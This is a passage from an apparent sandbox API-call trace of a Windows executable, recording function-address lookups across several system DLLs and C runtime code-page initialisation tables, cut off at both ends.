lpProcName="IsValidCodePage") returned 0x7514a090 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0300.754] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0300.754] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0300.754] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0300.754] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0300.754] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0300.754] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0300.754] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0300.754] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0300.754] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0300.754] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0300.754] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0300.754] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0300.754] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0300.754] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0300.754] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0300.755] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0300.755] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0300.755] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0300.755] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0300.755] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0300.755] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0300.755] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0300.755] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0300.755] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0300.755] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0300.755] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0300.755] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0300.755] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0300.755] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0300.755] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0300.755] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0300.756] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0300.756] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0300.756] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0300.756] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0300.756] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0300.756] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0300.756] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0300.756] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0300.756] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0300.756] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x74730000 [0300.756] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoW") returned 0x74731580 [0300.756] GetProcAddress (hModule=0x74730000, lpProcName="VerQueryValueW") returned 0x74731500 [0300.756] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoSizeW") returned 0x74731560 [0300.756] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0300.757] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0300.757] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x60bffd8c, dwHighDateTime=0x1d45ac6)) [0300.757] GetCurrentThreadId () returned 0x908 [0300.757] GetCurrentProcessId () returned 0x544 [0300.757] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34821965117) returned 1 [0300.757] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0300.757] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0300.757] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0300.757] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0300.757] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0300.758] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0300.759] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0300.760] GetCurrentThreadId () returned 0x908 [0300.760] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x7ae6ae7f, hStdError=0x475810)) [0300.760] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0300.760] GetFileType (hFile=0x38) returned 0x2 [0300.760] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.760] GetFileType (hFile=0x3c) returned 0x2 [0300.760] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0300.760] GetFileType (hFile=0x40) returned 0x2 [0300.760] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0300.760] GetEnvironmentStringsW () returned 0x301e00* [0300.760] FreeEnvironmentStringsW (penv=0x301e00) returned 1 [0300.760] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0300.761] GetLastError () returned 0x0 [0300.761] SetLastError (dwErrCode=0x0) [0300.761] GetLastError () returned 0x0 [0300.763] SetLastError (dwErrCode=0x0) [0300.764] GetLastError () returned 0x0 [0300.764] SetLastError (dwErrCode=0x0) [0300.764] GetACP () returned 0x4e4 [0300.764] GetLastError () returned 0x0 [0300.764] SetLastError (dwErrCode=0x0) [0300.764] IsValidCodePage (CodePage=0x4e4) returned 1 [0300.764] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0300.764] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0300.764] GetLastError () returned 0x0 [0300.764] SetLastError (dwErrCode=0x0) [0300.764] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0300.764] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0300.764] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0300.764] GetLastError () returned 0x0 [0300.764] SetLastError (dwErrCode=0x0) [0300.764] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0300.764] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0300.764] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0300.764] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0300.764] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xef\xaf\xe6\x7a\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0300.764] GetLastError () returned 0x0 [0300.764] SetLastError (dwErrCode=0x0) [0300.764] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0300.764] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0300.764] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0300.764] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0300.764] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x